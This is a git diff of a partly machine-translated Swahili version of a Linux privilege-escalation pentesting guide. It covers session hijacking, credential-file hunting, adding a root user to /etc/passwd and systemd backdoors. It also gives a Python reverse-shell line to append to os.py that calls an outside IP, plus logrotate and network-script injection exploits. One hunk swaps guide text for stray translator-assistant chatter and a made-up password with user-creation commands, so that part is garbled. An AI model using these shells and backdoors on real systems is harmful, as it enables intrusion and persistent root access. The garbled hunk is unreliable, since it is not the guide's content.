@@ -1133,44 +1134,43 @@ setresuid(geteuid(),geteuid(), geteuid()); execve(file,argv,0); } ``` -## Capabilities - -Linux capabilities hutoa a **subset of the available root privileges to a process**. Hii inavunja kwa ufanisi root **privileges into smaller and distinctive units**. Kila kimoja cha vitengo hivi kinaweza kisha kupewa processes kwa njia ya kujitegemea. Kwa hivyo seti kamili ya ruhusa inapunguzwa, kupunguza hatari za exploitation.\ -Read the following page to **learn more about capabilities and how to abuse them**: +## Uwezo +Linux capabilities hutoa **sehemu ndogo ya idhini za root kwa mchakato**. Hii kwa ufanisi inavunja idhini za root kuwa **vitengo vidogo na vitofauti**. Kila kimoja cha vitengo hivi kinaweza kisha kupewa mchakato kwa kujitegemea. Kwa njia hii seti kamili ya idhini inapunguzwa, ikipunguza hatari za kutumiwa vibaya.\ +Soma ukurasa ufuatao ili **kujifunza zaidi kuhusu uwezo na jinsi ya kuzitumia vibaya**: {{#ref}} linux-capabilities.md {{#endref}} -## Directory permissions +## Ruhusa za saraka -Katika saraka, the **bit for "execute"** ina maana kuwa mtumiaji aliyeguswa anaweza "**cd**" ndani ya folda.\ -The **"read"** bit inaonyesha mtumiaji anaweza **list** the **files**, na the **"write"** bit inaonyesha mtumiaji anaweza **delete** na **create** faili mpya. +Katika saraka, **bit for "execute"** inaashiria kuwa mtumiaji aliyeathiriwa anaweza "**cd**" kuingia ndani ya saraka.\ +Kipengee cha **"read"** kinaashiria kuwa mtumiaji anaweza kuorodhesha **faili**, na kipengee cha **"write"** kinaashiria mtumiaji anaweza **kufuta** na **kuunda** **faili** mpya. ## ACLs -Access Control Lists (ACLs) zinawakilisha tabaka la pili la ruhusa za hiari, zikiweza **overriding the traditional ugo/rwx permissions**. Ruhusa hizi zinaboresha udhibiti wa ufikaji wa faili au saraka kwa kuruhusu au kukataa haki kwa watumiaji maalum ambao si wamiliki au sehemu ya kikundi. Kiwango hiki cha **granularity ensures more precise access management**. 
Maelezo zaidi yanaweza kupatikana [**here**](https://linuxconfig.org/how-to-manage-acls-on-linux). +Access Control Lists (ACLs) zinawakilisha safu ya pili ya ruhusa za hiari, zenye uwezo wa **kupitisha ruhusa za jadi za ugo/rwx**. Ruhusa hizi zinaboresha udhibiti wa upatikanaji wa faili au directory kwa kuruhusu au kukataa haki kwa watumiaji maalum ambao si wamiliki au sehemu ya kikundi. Kiwango hiki cha **undani kinahakikisha usimamizi sahihi zaidi wa upatikanaji**. Maelezo zaidi yanaweza kupatikana [**here**](https://linuxconfig.org/how-to-manage-acls-on-linux). -**Give** user "kali" read and write permissions over a file: +**Mpa** mtumiaji "kali" read na write ruhusa juu ya faili: ```bash setfacl -m u:kali:rw file.txt #Set it in /etc/sudoers or /etc/sudoers.d/README (if the dir is included) setfacl -b file.txt #Remove the ACL of the file ``` -**Pata** faili zenye ACL maalum kwenye mfumo: +**Pata** faili zilizo na ACLs maalum kutoka kwenye mfumo: ```bash getfacl -t -s -R -p /bin /etc /home /opt /root /sbin /usr /tmp 2>/dev/null ``` ## Fungua shell sessions -Katika **toleo za zamani** unaweza **hijack** baadhi ya **shell** session za mtumiaji mwingine (**root**).\ -Katika **toleo jipya zaidi** utaweza tu **connect** kwenye screen sessions za **mtumiaji wako mwenyewe**. Hata hivyo, unaweza kupata **taarifa za kuvutia ndani ya session**. +Katika **matoleo ya zamani** unaweza **hijack** baadhi ya **shell** session za mtumiaji tofauti (**root**).\ +Katika **matoleo ya hivi karibuni** utaweza **kuungana** na screen sessions za **mtumiaji wako mwenyewe** tu. Hata hivyo, unaweza kupata **taarifa za kuvutia ndani ya session**. ### screen sessions hijacking -**Orodha ya screen sessions** +**Orodhesha screen sessions** ```bash screen -ls screen -ls / # Show another user' screen sessions 
@@ -1183,11 +1183,11 @@ screen -dr #The -d is to detach whoever is attached to it screen -dr 3350.foo #In the example of the image screen -x [user]/[session id] ``` -## tmux sessions hijacking +## Kupora vikao vya tmux -Hili lilikuwa tatizo kwa **old tmux versions**. Sikuweza hijack tmux (v2.1) session iliyoundwa na root kama mtumiaji asiye na ruhusa. +Hii ilikuwa tatizo kwa **matoleo ya zamani ya tmux**. Sikuweza kuiba kikao cha tmux (v2.1) kilichoundwa na root nikiwa mtumiaji asiye na ruhusa. -**Orodhesha tmux sessions** +**Orodhesha vikao vya tmux** ```bash tmux ls ps aux | grep tmux #Search for tmux consoles not using default folder for sockets @@ -1195,7 +1195,7 @@ tmux -S /tmp/dev_sess ls #List using that socket, you can start a tmux session i ``` ![](<../../images/image (837).png>) -**Unganisha kwenye session** +**Ambatisha kwenye session** ```bash tmux attach -t myname #If you write something in this session it will appears in the other opened one tmux attach -d -t myname #First detach the session from the other console and then access it yourself 
@@ -1212,72 +1212,72 @@ Angalia **Valentine box from HTB** kwa mfano. ### Debian OpenSSL Predictable PRNG - CVE-2008-0166 All SSL and SSH keys generated on Debian based systems (Ubuntu, Kubuntu, etc) between September 2006 and May 13th, 2008 may be affected by this bug.\ -Hitilafu hii inatokea wakati wa kuunda ssh key mpya katika OS hizo, kwa kuwa **zilikuwa na utofauti wa 32,768 tu**. Hii inamaanisha kuwa uwezekano wote unaweza kuhesabiwa na **ikiwa una ssh public key unaweza kutafuta private key inayolingana**. Unaweza kupata uwezekano uliokadiriwa hapa: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) +Hitilafu hii hutokea wakati wa kuunda ssh key mpya katika OS hizo, kwa sababu **tu 32,768 variations zilitumika**. Hii ina maana kwamba uwezekano wote unaweza kuhesabiwa na **ukiwa na ssh public key unaweza kutafuta private key inayolingana**. Unaweza kupata uwezekano uliohesabiwa hapa: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) ### SSH Interesting configuration values -- **PasswordAuthentication:** Inaonyesha ikiwa uthibitishaji kwa password unaruhusiwa. Chaguo-msingi ni `no`. -- **PubkeyAuthentication:** Inaonyesha ikiwa public key authentication inaruhusiwa. Chaguo-msingi ni `yes`. -- **PermitEmptyPasswords**: Wakati password authentication inaporuhusiwa, inaonyesha kama server inaruhusu kuingia kwenye akaunti zenye nywila tupu. Chaguo-msingi ni `no`. +- **PasswordAuthentication:** Inaeleza kama password authentication inaruhusiwa. Chaguo-msingi ni `no`. +- **PubkeyAuthentication:** Inaeleza kama public key authentication inaruhusiwa. Chaguo-msingi ni `yes`. +- **PermitEmptyPasswords**: Wakati password authentication inaruhusiwa, inaeleza kama server inaruhusu kuingia kwenye akaunti zenye password tupu. Chaguo-msingi ni `no`. ### PermitRootLogin -Inaonyesha ikiwa root anaweza kuingia kwa kutumia ssh, chaguo-msingi ni `no`. 
Thamani zinazowezekana: +Inaeleza kama root anaweza kuingia kwa kutumia ssh, chaguo-msingi ni `no`. Thamani zinazowezekana: - `yes`: root anaweza kuingia kwa kutumia password na private key -- `without-password` or `prohibit-password`: root anaweza kuingia kwa private key tu -- `forced-commands-only`: root anaweza kuingia kwa private key tu na ikiwa chaguo la commands limetajwa +- `without-password` or `prohibit-password`: root anaweza kuingia tu kwa private key +- `forced-commands-only`: Root anaweza kuingia tu kwa private key na ikiwa options za commands zimeelezwa - `no` : hapana ### AuthorizedKeysFile -Inaonyesha faili zinazobeba public keys ambazo zinaweza kutumika kwa uthibitishaji wa mtumiaji. Inaweza kuwa na tokens kama `%h`, ambazo zitatengenezwa na home directory. **Unaweza taja absolute paths** (zinazoanza na `/`) au **relative paths kutoka kwenye home ya mtumiaji**. Kwa mfano: +Inaeleza faili zinazobeba public keys ambazo zinaweza kutumika kwa user authentication. Inaweza kuwa na tokens kama `%h`, ambazo zitabadilishwa na home directory. **Unaweza kuonyesha absolute paths** (zinazoanza na `/`) au **relative paths kutoka home ya mtumiaji**. Kwa mfano: ```bash AuthorizedKeysFile .ssh/authorized_keys access ``` -Usanidi huo utaonyesha kwamba ikiwa utajaribu kuingia kwa kutumia ufunguo wa **private** wa mtumiaji "**testusername**", ssh italinganisha **public key** ya ufunguo wako na zile zilizoko katika `/home/testusername/.ssh/authorized_keys` na `/home/testusername/access` +Mipangilio hiyo itaonyesha kwamba ikiwa utajaribu kuingia kwa kutumia funguo ya **private** ya mtumiaji "**testusername**", ssh italinganisha public key ya funguo yako na zile zilizopo katika `/home/testusername/.ssh/authorized_keys` na `/home/testusername/access` ### ForwardAgent/AllowAgentForwarding -SSH agent forwarding inakuwezesha **use your local SSH keys instead of leaving keys** (bila passphrases!) zikaa kwenye server yako. 
Hivyo, utaweza **jump** kupitia ssh **to a host** na kutoka hapo **jump to another** host **using** the **key** located in your **initial host**. +SSH agent forwarding inakuruhusu **use your local SSH keys instead of leaving keys** (without passphrases!) kukaa kwenye server yako. Hivyo, utaweza **jump** kupitia ssh **to a host** na kutoka hapo **jump to another** host **using** the **key** iliyoko kwenye **initial host** yako. Unahitaji kuweka chaguo hili katika `$HOME/.ssh.config` kama ifuatavyo: ``` Host example.com ForwardAgent yes ``` -Tambua kwamba ikiwa `Host` ni `*`, kila mara mtumiaji anapohama kwa mashine tofauti, host huyo ataweza kufikia keys (ambayo ni suala la usalama). +Kumbuka kwamba ikiwa `Host` ni `*`, kila wakati mtumiaji anaporuka kwenda kwenye mashine tofauti, host hiyo itaweza kufikia vifunguo (ambayo ni tatizo la usalama). -The file `/etc/ssh_config` can **kupindua** chaguo hizi na kuruhusu au kukataa usanidi huu.\ -The file `/etc/sshd_config` can **kuruhusu** au **kukataa** ssh-agent forwarding with the keyword `AllowAgentForwarding` (default ni allow). +Faili `/etc/ssh_config` inaweza **kubatilisha** chaguzi hizi na kuruhusu au kukataa usanidi huu.\ +Faili `/etc/sshd_config` inaweza **kuruhusu** au **kukataa** ssh-agent forwarding kwa neno muhimu `AllowAgentForwarding` (chaguo-msingi ni kuruhusu). -Ikiwa unagundua kuwa Forward Agent imewekwa katika mazingira, soma ukurasa ufuatao kwani **you may be able to abuse it to escalate privileges**: +Ikiwa utagundua kuwa Forward Agent imewekwa kwenye mazingira, soma ukurasa ufuatao kwa kuwa **huenda ukaweza kuibitumia vibaya ili kupandisha ruhusa**: {{#ref}} ssh-forward-agent-exploitation.md {{#endref}} -## Faili Zilizovutia +## Faili za Kuvutia -### Faili za Profile +### Faili za profile -The file `/etc/profile` and the files under `/etc/profile.d/` are **scripts ambazo zinaendeshwa wakati mtumiaji anapoanzisha shell mpya**. 
Kwa hiyo, ikiwa unaweza **kuandika au kubadilisha yoyote yao unaweza escalate privileges**. +Faili `/etc/profile` na faili zilizo chini ya `/etc/profile.d/` ni **skripti zinazotekelezwa wakati mtumiaji anapoendesha shell mpya**. Kwa hiyo, ikiwa unaweza **kuandika au kubadilisha yoyote kati yao unaweza kupandisha ruhusa**. ```bash ls -l /etc/profile /etc/profile.d/ ``` -Kama script yoyote ya wasifu isiyo ya kawaida inapopatikana, unapaswa kuiangalia kwa **maelezo nyeti**. +Ikiwa skripti ya profaili isiyokuwa ya kawaida inapopatikana, unapaswa kuikagua kwa ajili ya **maelezo nyeti**. -### Faili za Passwd/Shadow +### Passwd/Shadow Files -Kulingana na OS, `/etc/passwd` na `/etc/shadow` zinaweza kuwa zikiitwa kwa jina tofauti au kunaweza kuwa na nakala ya kuhifadhi. Kwa hivyo inashauriwa **kutafuta zote** na **kuangalia ikiwa unaweza kuzisoma** ili kuona **ikiwa kuna hashes** ndani ya faili: +Kulingana na OS faili za `/etc/passwd` na `/etc/shadow` zinaweza kuwa zikitumia jina tofauti au kunaweza kuwa na nakala ya chelezo. Kwa hivyo inashauriwa **kutafuta zote** na **kuangalia kama unaweza kusoma** ili kuona **ikiwa kuna hashes** ndani ya faili: ```bash #Passwd equivalent files cat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null #Shadow equivalent files cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db /etc/security/opasswd 2>/dev/null ``` -Katika baadhi ya matukio unaweza kupata **password hashes** ndani ya faili ya `/etc/passwd` (au sawa). +Katika baadhi ya matukio unaweza kupata **password hashes** ndani ya faili ya `/etc/passwd` (au faili sawa) ```bash grep -v '^[^:]*:[x\*]' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null ``` 
@@ -1289,48 +1289,45 @@ openssl passwd -1 -salt hacker hacker mkpasswd -m SHA-512 hacker python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")' ``` -Generated password: qH7$9vRkP2mX!z8B +Ninaomba ufafanuzi/kopi ya yaliyomo ya src/linux-hardening/privilege-escalation/README.md (markdown) ili niweze kutafsiri na kuongezea mstari unaoonyesha kuongeza user `hacker` na nywila iliyotengenezwa. +Unataka nipate nywila salama moja na kuiweka wazi ndani ya faili (plain text), au ungependelea tu kuonyesha amri za kuunda user na kuweka password bila kuandika nywila wazi? -Commands to add the user and set the password: -sudo useradd -m -s /bin/bash hacker -echo 'hacker:qH7$9vRkP2mX!z8B' | sudo chpasswd -sudo passwd -e hacker # force password change on first login (optional) -sudo usermod -aG sudo hacker # give sudo (optional) +Tuma yaliyomo ya README.md hapa, na thibitisha chaguo la password. ``` hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash ``` Kwa mfano: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` -Sasa unaweza kutumia amri ya `su` kwa kutumia `hacker:hacker` +Sasa unaweza kutumia amri ya `su` ukitumia `hacker:hacker` -Kwa njia mbadala, unaweza kutumia mistari ifuatayo kuongeza mtumiaji wa bandia bila nywila.\ -ONYO: unaweza kudhoofisha usalama wa sasa wa mashine. +Mbali na hayo, unaweza kutumia mistari ifuatayo kuongeza mtumiaji wa kuigiza bila nenosiri.\ +ONYO: unaweza kupunguza usalama wa sasa wa mashine. ``` echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd su - dummy ``` -Kumbuka: Katika majukwaa ya BSD `/etc/passwd` iko katika `/etc/pwd.db` na `/etc/master.passwd`, pia `/etc/shadow` imepitwa jina kuwa `/etc/spwd.db`. +Kumbuka: Katika majukwaa ya BSD `/etc/passwd` iko katika `/etc/pwd.db` na `/etc/master.passwd`, pia `/etc/shadow` imebadilishwa jina kuwa `/etc/spwd.db`. -Unapaswa kuangalia kama unaweza **kuandika katika baadhi ya faili nyeti**. Kwa mfano, je, unaweza kuandika kwenye baadhi ya **faili za usanidi za huduma**? 
+Unapaswa kuangalia ikiwa unaweza **kuandika kwenye baadhi ya faili nyeti**. Kwa mfano, je, unaweza kuandika kwenye baadhi ya **faili ya usanidi ya huduma**? ```bash find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | sort | uniq #Find files owned by the user or writable by anybody for g in `groups`; do find \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME; done #Find files writable by any group of the user ``` -Kwa mfano, ikiwa mashine inaendesha seva ya **tomcat** na unaweza **modify the Tomcat service configuration file inside /etc/systemd/,** basi unaweza kubadilisha mistari zifuatazo: +Kwa mfano, ikiwa mashine inaendesha server ya **tomcat** na unaweza **modify the Tomcat service configuration file inside /etc/systemd/,** basi unaweza kubadilisha mistari: ``` ExecStart=/path/to/backdoor User=root Group=root ``` -Backdoor yako itatekelezwa mara tomcat itakapozinduliwa tena. +Backdoor yako itaendeshwa mara ijayo tomcat itakapowashwa. -### Angalia Folda +### Kagua Folda -Folda zifuatazo zinaweza kuwa na backups au taarifa za kuvutia: **/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports, /root** (Huenda hauwezi kusoma ile ya mwisho lakini jaribu) +Folda zifuatazo zinaweza kuwa na backups au taarifa za kuvutia: **/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports, /root** (Huenda huwezi kusoma ile ya mwisho, lakini jaribu) ```bash ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/ /root ``` -### Eneo la Ajabu/Owned mafaili +### Nafasi Isiyo ya Kawaida/Mafaili ya Owned ```bash #root owned files in /home folders find /home -user root 2>/dev/null 
@@ -1347,11 +1344,11 @@ find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -pat done done ``` -### Faili zilizobadilishwa katika dakika za hivi karibuni +### Faili zilizobadilishwa katika dakika zilizopita ```bash find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" 2>/dev/null ``` -### Faili za Sqlite DB +### Sqlite DB mafaili ```bash find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null ``` @@ -1359,7 +1356,7 @@ find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null ```bash find / -type f \( -name "*_history" -o -name ".sudo_as_admin_successful" -o -name ".profile" -o -name "*bashrc" -o -name "httpd.conf" -o -name "*.plan" -o -name ".htpasswd" -o -name ".git-credentials" -o -name "*.rhosts" -o -name "hosts.equiv" -o -name "Dockerfile" -o -name "docker-compose.yml" \) 2>/dev/null ``` -### Faili fiche +### Mafaili yaliyofichwa ```bash find / -type f -iname ".*" -ls 2>/dev/null ``` @@ -1368,7 +1365,7 @@ find / -type f -iname ".*" -ls 2>/dev/null for d in `echo $PATH | tr ":" "\n"`; do find $d -name "*.sh" 2>/dev/null; done for d in `echo $PATH | tr ":" "\n"`; do find $d -type f -executable 2>/dev/null; done ``` -### **Faili za wavuti** +### **Mafaili ya wavuti** ```bash ls -alhR /var/www/ 2>/dev/null ls -alhR /srv/www/htdocs/ 2>/dev/null 
@@ -1379,22 +1376,22 @@ ls -alhR /opt/lampp/htdocs/ 2>/dev/null ```bash find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bck" -o -name "*\.bk" \) 2>/dev/null ``` -### Mafaili yanayojulikana yanayoweza kuwa na passwords +### Faili zilizojulikana zenye nywila -Soma msimbo wa [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), inatafuta **mafayela kadhaa yanayoweza kuwa na passwords**.\ -**Chombo kingine kinachovutia** ambacho unaweza kutumia kufanya hivyo ni: [**LaZagne**](https://github.com/AlessandroZ/LaZagne) ambacho ni programu ya chanzo wazi inayotumika kupata passwords nyingi zilizohifadhiwa kwenye kompyuta ya ndani kwa Windows, Linux & Mac. +Soma msimbo wa [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), inatafuta **faili kadhaa zinazowezekana ambazo zinaweza kuwa na nywila**.\ +**Zana nyingine ya kuvutia** ambayo unaweza kutumia kufanya hivyo ni: [**LaZagne**](https://github.com/AlessandroZ/LaZagne) ambayo ni programu ya open source inayotumika kupata nywila nyingi zilizohifadhiwa kwenye kompyuta ya ndani kwa Windows, Linux & Mac. ### Logs -Ikiwa unaweza kusoma logs, unaweza kupata **taarifa za kuvutia/za siri ndani yao**. Kadri log inavyokuwa isiyo ya kawaida, ndivyo itakavyo kuwa ya kuvutia zaidi (labda).\ -Pia, baadhi ya **bad** zilizopangwa vibaya (backdoored?) **audit logs** zinaweza kukuwezesha **kurekodi passwords** ndani ya audit logs kama ilivyoelezwa katika chapisho hiki: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/). +Ikiwa unaweza kusoma logs, unaweza kupata **taarifa za kuvutia/za siri ndani yake**. Kadri log inavyoonekana ya ajabu, ndivyo itakavyokuwa ya kuvutia zaidi (pengine).\ +Pia, baadhi ya "**bad**" configured (backdoored?) 
**audit logs** zinaweza kukuwezesha **kurekodi nywila** ndani ya audit logs kama inavyoelezwa katika chapisho hili: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/]. ```bash aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g" grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null ``` -Ili **kusoma logs kikundi** [**adm**](interesting-groups-linux-pe/index.html#adm-group) kitakuwa cha msaada sana. +Ili kusoma logs, kikundi [**adm**](interesting-groups-linux-pe/index.html#adm-group) kitakuwa msaada mkubwa. -### Mafaili ya Shell +### Faili za Shell ```bash ~/.bash_profile # if it exists, read it once when you log in to the shell ~/.bash_login # if it exists, read it once if .bash_profile doesn't exist 
@@ -1407,41 +1404,41 @@ Ili **kusoma logs kikundi** [**adm**](interesting-groups-linux-pe/index.html#adm ``` ### Generic Creds Search/Regex -Unapaswa pia kuangalia faili zenye neno "**password**" katika **jina** lake au ndani ya **yaliyomo**, na pia angalia IPs na emails ndani ya logs, au hashes regexps.\ -Sitaelezea hapa jinsi ya kufanya yote haya, lakini ikiwa unavutiwa unaweza kuangalia ukaguzi wa mwisho unaofanywa na [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh). +Unapaswa pia kuangalia faili zenye neno "**password**" katika **jina** au ndani ya **maudhui**, na pia angalia IPs na emails ndani ya logs, au hashes regexps.\ +Sitaorodhesha hapa jinsi ya kufanya yote haya, lakini ikiwa una nia unaweza kuangalia ukaguzi wa mwisho ambao [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh) hufanya. -## Faili zinazoweza kuandikwa +## Writable files ### Python library hijacking -Kama unajua kutoka **wapi** script ya python itaendeshwa na unaweza **kuandika ndani ya** folda hiyo au unaweza **kuhariri python libraries**, unaweza kubadilisha OS library na kuiweka backdoor (ikiwa unaweza kuandika mahali script ya python itaendeshwa, nakili na weka os.py library). +Ikiwa unajua kutoka **wapi** script ya python itaendeshwa na unaweza **kuandika ndani** ya folda hiyo au unaweza **kuhariri maktaba za python**, unaweza kubadilisha maktaba ya OS na kuiweka backdoor (kama unaweza kuandika mahali script ya python itaendeshwa, nakili na ubandike maktaba os.py). 
-Ili **backdoor the library**, ongeza tu mwishoni mwa os.py library mstari ufuatao (badilisha IP na PORT): +Ili **backdoor the library** ongeza tu mwishoni mwa maktaba os.py mstari ufuatao (badilisha IP na PORT): ```python import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); ``` ### Logrotate exploitation -Udhaifu katika `logrotate` unamruhusu mtumiaji mwenye **write permissions** kwenye faili la logi au kwenye saraka zake za mzazi kupata kwa namna inayowezekana kupandishwa kwa ruhusa. Hii ni kwa sababu `logrotate`, mara nyingi ikiwa inakimbia kama **root**, inaweza kudhibitiwa ili iendeshe faili zozote, hasa katika saraka kama _**/etc/bash_completion.d/**_. Ni muhimu kukagua ruhusa si tu katika _/var/log_ bali pia katika saraka yoyote ambapo rotation ya logi inafanywa. +Udhaifu katika `logrotate` unawawezesha watumiaji wenye **write permissions** kwenye faili ya logi au saraka zake za juu kupata ruhusa za juu. Hii ni kwa sababu `logrotate`, mara nyingi ikifanya kazi kama **root**, inaweza kudanganywa ili kuendesha faili zozote, hasa katika saraka kama _**/etc/bash_completion.d/**_. Ni muhimu kukagua ruhusa sio tu katika _/var/log_ bali pia katika saraka yoyote ambapo log rotation inatumika. > [!TIP] -> Udhaifu huu unaathiri `logrotate` toleo `3.18.0` na zile za zamani +> Udhaifu huu unaathiri `logrotate` version `3.18.0` and older -Maelezo ya kina kuhusu udhaifu yanaweza kupatikana kwenye ukurasa huu: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition). +Maelezo zaidi kuhusu udhaifu yanaweza kupatikana kwenye ukurasa huu: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition). 
-Unaweza kumanfaatkan udhaifu huu kwa kutumia [**logrotten**](https://github.com/whotwagner/logrotten). +Unaweza kutumia udhaifu huu kwa kutumia [**logrotten**](https://github.com/whotwagner/logrotten). -Udhaifu huu ni sawa sana na [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx logs),** hivyo kila unapogundua unaweza kubadilisha logs, angalia ni nani anasimamia logs hizo na angalia kama unaweza kupandisha ruhusa kwa kuchukua nafasi ya logs kwa symlinks. +Udhaifu huu ni sawa sana na [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx logs),** hivyo kila unapogundua unaweza kubadilisha logs, angalia nani anasimamia logs hizo na angalia kama unaweza kupata ruhusa za juu kwa kubadilisha logs kuwa symlinks. ### /etc/sysconfig/network-scripts/ (Centos/Redhat) **Vulnerability reference:** [**https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f) -Ikiwa, kwa sababu yoyote ile, mtumiaji anaweza **kuandika** script ya `ifcf-` kwenye _/etc/sysconfig/network-scripts_ **au** anaweza **kurekebisha** ile iliyopo, basi mfumo wako ume-pwned. +Ikiwa, kwa sababu yoyote, mtumiaji anaweza kuandika script ya `ifcf-` katika _/etc/sysconfig/network-scripts_ au kurekebisha ile iliyopo, basi **system yako is pwned**. -Network scripts, _ifcg-eth0_ kwa mfano, hutumika kwa muunganisho wa network. Zinataonekana kabisa kama faili za .INI. Hata hivyo, zinakuwa \~sourced\~ kwenye Linux na Network Manager (dispatcher.d). +Network scripts, _ifcg-eth0_ kwa mfano hutumika kwa miunganisho ya mtandao. Zinatafutwa sawasawa na .INI files. Hata hivyo, zinakuwa ~sourced~ kwenye Linux na Network Manager (dispatcher.d). -Katika kesi yangu, thamani ya `NAME=` katika network scripts hizi haishughulikiwi vizuri. Ikiwa una **nafasi tupu** ndani ya jina mfumo hujaribu kutekeleza sehemu baada ya nafasi hiyo. 
Hii inamaanisha kuwa **kila kitu kilicho baada ya nafasi ya kwanza kinakimbizwa kama root**. +Katika kesi yangu, thamani ya `NAME=` iliyowekwa katika scripts hizi za mtandao haiendeshwi ipasavyo. Ikiwa jina lina nafasi tupu/blank mfumo hujaribu kutekeleza sehemu iliyofuata nafasi hiyo. Hii ina maana kwamba **kila kitu kinachofuata nafasi ya kwanza kinatekelezwa kama root**. Kwa mfano: _/etc/sysconfig/network-scripts/ifcfg-1337_ ```bash 
@@ -1451,13 +1448,13 @@ DEVICE=eth0 ``` (_Kumbuka nafasi tupu kati ya Network na /bin/id_) -### **init, init.d, systemd, and rc.d** +### **init, init.d, systemd, na rc.d** -Directory `/etc/init.d` ni nyumbani kwa **scripts** za System V init (SysVinit), **classic Linux service management system**. Inajumuisha scripts za `start`, `stop`, `restart`, na wakati mwingine `reload` services. Hizi zinaweza kutekelezwa moja kwa moja au kupitia symbolic links zilizo kwenye `/etc/rc?.d/`. Njia mbadala kwenye Redhat systems ni `/etc/rc.d/init.d`. +The directory `/etc/init.d` is home to **scripts** for System V init (SysVinit), the **classic Linux service management system**. It includes scripts to `start`, `stop`, `restart`, and sometimes `reload` services. These can be executed directly or through symbolic links found in `/etc/rc?.d/`. An alternative path in Redhat systems is `/etc/rc.d/init.d`. -Kwa upande mwingine, `/etc/init` inahusishwa na **Upstart**, mfumo mpya wa **service management** ulioanzishwa na Ubuntu, unaotumia faili za configuration kwa kazi za usimamizi wa services. Licha ya mabadiliko kwenda Upstart, SysVinit scripts bado zinatumiwa pamoja na Upstart configurations kutokana na compatibility layer ndani ya Upstart. +Kwa upande mwingine, `/etc/init` inahusishwa na **Upstart**, mfumo mpya wa **service management** uliotangazwa na Ubuntu, unaotumia mafaili ya configuration kwa shughuli za usimamizi wa service. Licha ya mabadiliko kuelekea Upstart, script za SysVinit bado zinatumika pamoja na configuration za Upstart kwa sababu ya safu ya ulinganifu ndani ya Upstart. -**systemd** inatokea kama mfumo wa kisasa wa initialization na service manager, ukitoa vipengele vya juu kama on-demand daemon starting, automount management, na system state snapshots. Inaweka faili kwenye `/usr/lib/systemd/` kwa ajili ya distribution packages na `/etc/systemd/system/` kwa ajili ya administrator modifications, ikirahisisha mchakato wa usimamizi wa system. 
+**systemd** emerges as a modern initialization and service manager, offering advanced features such as on-demand daemon starting, automount management, and system state snapshots. It organizes files into `/usr/lib/systemd/` for distribution packages and `/etc/systemd/system/` for administrator modifications, streamlining the system administration process. ## Mbinu Nyingine @@ -1484,7 +1481,7 @@ cisco-vmanage.md ## Android rooting frameworks: manager-channel abuse -Android rooting frameworks mara nyingi hu-hook syscall ili kufichua privileged kernel functionality kwa userspace manager. Udhibitishaji dhaifu wa manager (mfano, signature checks based on FD-order au poor password schemes) unaweza kumuwezesha local app kujifanya manager na escalate to root kwenye devices ambazo tayari zime-rooted. Jifunze zaidi na maelezo ya exploitation hapa: +Android rooting frameworks commonly hook a syscall to expose privileged kernel functionality to a userspace manager. Weak manager authentication (e.g., signature checks based on FD-order or poor password schemes) can enable a local app to impersonate the manager and escalate to root on already-rooted devices. Jifunze zaidi na maelezo ya exploitation hapa: {{#ref}} 
